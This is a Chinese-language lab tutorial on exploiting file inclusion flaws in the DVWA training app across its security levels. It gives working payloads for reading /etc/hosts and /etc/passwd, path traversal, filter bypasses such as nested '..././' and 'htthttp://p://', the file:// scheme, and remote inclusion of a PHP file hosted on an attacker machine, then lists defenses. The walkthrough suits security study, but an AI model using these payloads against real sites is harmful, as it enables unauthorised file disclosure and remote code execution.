dvwa中的文件包含攻击

文章详细介绍了文件包含漏洞的概念,特别关注PHP中的文件包含函数,如require()和include()。通过DVWA平台的不同安全级别(Low,Medium,High,Impossible)展示了文件包含漏洞的利用方式,包括本地文件包含和远程文件包含,以及如何通过修改URL参数绕过防护措施执行恶意代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境:

dvwa: 192.168.11.135 dvwa版本 Version 1.9 (Release date: 2015-09-19)

kail机器:192.168.11.156

一、什么是文件包含漏洞?

为简化代码,会把重复的code内容单独写到一个页面文件,然后再需要调用重复内容的页面中使用include方法来包含重复代码的页面就可以了。

使用include方法可以让当前页面去执行指定的另外一个文件中的代码内容。若没有对这种行为做限制,那么黑客将很有可能让当前页面去执行超出 Web 目录中的文件或者是 Web 目录中不希望被执行的敏感文件,甚至是远程服务器上的文件。比如黑客使用 include 方法去调用 Linux 系统中的 /etc/passwd,就会在当前页面中显示系统中的用户信息;或者黑客自己搭建 Web 服务器,在自己的服务器上写一个 Webshell,然后通过 include 方法在目标页面中执行本地服务器中的 Webshell。

几乎所有的脚本语言中都提供文件包含的功能,但文件包含漏洞在php中居多,而在jsp\ASP\ASP.NETC程序中非常少,甚至没有文件包含漏洞的存在。

原理服务器解析执行php文件时能通过包含函数加载另外一个文件中的php代码,当被包含的文件中存在木马时,木马程序会在服务器上加载执行

下面介绍php的四种文件包含函数

  • require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本

  • require_once():功能与requir()相同区别在于当重复调用一个文件时,程序只调用一次

  • include():执行到include()函数时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行

  • include_once():功能和includ()相同,区别当重复调用一个文件时,程序只调用一次

  • nighcight_file(),show_source()函数对文件进行语法高亮显示,通常能看到源代码

  • readfile(),file_get_contents()函数读取一个文件,并写入输出缓冲

  • fopen(),打开一个文件或者url

文件包含漏洞包括本地文件包含漏洞和远程文件包含漏洞:

  • 本地文件包含漏洞指的是包含本地的php文件;

  • 远程文件包含漏洞包含的是其它服务器上的php文件。需要满足两个条件在php.ini中。当php.ini中的配置选项allow_url_fopen:on allow_url_include:on,对方开启这两个配置时才可以使用

dvwa: 192.168.11.135 环境开启了:

二、演示dvwa上的文件包含漏洞

2.1、low级别

源码

1、安全级别设置为Low,点击 File Inclusion 按钮,进入文件包含攻击页面。页面中有 3 个文件链接:

点击后会读取出系统的相关信息,说明这 3 个文件内含有读取相关系统信息的脚本代码,被包含进当前页面执行了。

当前的 URL 显示了 http://192.168.11.135:81/vulnerabilities/fi/?page=后就是被包含的文件名 file3.php。

2、考虑到我们当前 Web 服务器(dvwa)是使用的 docker容器(Linux),把 URL 中的文件名替换为 /etc/hosts,发现可以通过绝对路径直接显示 hosts 文件中的内容:

3、使用相对路径 ../../phpinfo.php 来替换 URL 中的包含文件名,可以执行 DVWA 程序自带的 phpinfo 信息。当前目录是vulnerabilities/fi/,向上返回2层,就到了 /,所以 ../../phpinfo.php就是指 /phpinfo.php 这个文件

4、在kali攻击机上自行搭建一个 Web 服务(sudo service apache2 start),在 Web 根目录/var/www/html下写入一个 shell.php 文件(内容:<?php phpinfo();?>),用来显示 PHPINFO:

使用http://192.168.11.156/shell.php来替换原 URL 中包含的文件名,可以远程执行 PHP 脚本

2.2、medium级别

1、安全级别设置为 Medium,进入文件包含攻击页面,查看源码:

发现使用 str_replace() 函数把 http://、https://、../、..\ 替换为了空值,来防止远程文件包含和相对路径的文件包含。但是str_replace() 函数相当不安全,只做一次替换,比如在 http:// 中再嵌套一个 http:// 则可以绕过限制;另外,并没有对绝对路径的文件包含进行防护。

2、绝对路径与相对路径的文件包含攻击

使用绝对路径 /etc/hosts 的文件包含,不受任何影响:

使用相对路径 ../../phpinfo.php 进行文件包含不被允许:

使用相对路径进行文件包含不被允许,但可以通过在../中多嵌套一个../绕过,在 URL 中输入包含的文件名为..././..././phpinfo.php,可以成功执行:

3、使用远程文件包含,需要在 http:// 中多嵌套一个 http://,在 URL 中输入包含的文件名为htthttp://p://192.168.11.156/shell.php,可以成功执行

2.3、High级别

1、安全级别设置为 High,进入文件包含攻击页面,查看源码:

发现使用 fnmatch() 函数来检查变量 page 值的开头必须是 file或者file是include.php文件,否则就不执行。

2、可以利用 file 协议来绕过防御。使用 file 协议可以来描述一个文件的绝对路径。我们这里在 URL 中输入包含的文件名为file:///etc/hosts,可以成功输出文件内容

2.4、Impossible级别

1、安全级别设置为 Impossible,进入文件包含攻击页面,查看源码:

发现使用了白名单机制,提交的page 变量只能是include.php、file1.php,file2.php,file3.php这四个文件,否则就不执行,彻底杜绝了文件包含漏洞。

### DVWA 文件包含漏洞 #### 漏洞利用原理 DVWA (Damn Vulnerable Web Application) 是一款用于安全测试的学习平台,其中包含了多种常见的Web应用漏洞。文件包含漏洞允许攻击者通过操纵URL参数来读取或执行服务器上的任意文件。这种类型的漏洞可以分为本地文件包含(LFI)和远程文件包含(RFI)。当应用程序使用用户输入作为文件路径的一部分而不做适当验证时就会发生此类问题。 在DVWA环境中设置低安全性级别下,可以通过修改`fileinclude.php`页面中的`page`参数来进行文件包含攻击尝试。例如,在浏览器地址栏中输入如下链接: ``` http://<your-ip>/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd ``` 这将试图访问Linux系统的密码文件 `/etc/passwd` 并将其内容显示给用户[^2]。 #### 解决方案与防御措施 为了防止文件包含漏洞的发生,应该采取以下几种方法之一或多者的组合策略: - **白名单验证**: 对于任何可能被用来指定要加载资源位置的数据项都应实施严格的白名单过滤机制。只允许特定目录内的文件名,并且不允许有特殊字符存在。 - **移除危险函数**: 如果不需要动态加载PHP脚本,则可以从代码库中删除 `include()`, `require()` 及其变体等潜在风险较高的内置功能调用。 - **禁用远程文件包含支持**: PHP配置选项 `allow_url_include` 应该始终设为关闭状态 (`Off`) 来阻止恶意网站提供的外部资源被执行的可能性。 - **最小权限原则**: 运行Web服务进程所使用的操作系统账户应当具有尽可能少的操作权利;即使成功实现了非法文件的引入也无法造成更大损害。 ```php // 示例:检查并净化传入的 page 参数 $allowed_pages = ['home', 'about', 'contact']; if (!in_array($_GET['page'], $allowed_pages)) { die('Invalid request.'); } $page = $_GET['page'] . '.php'; include($page); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值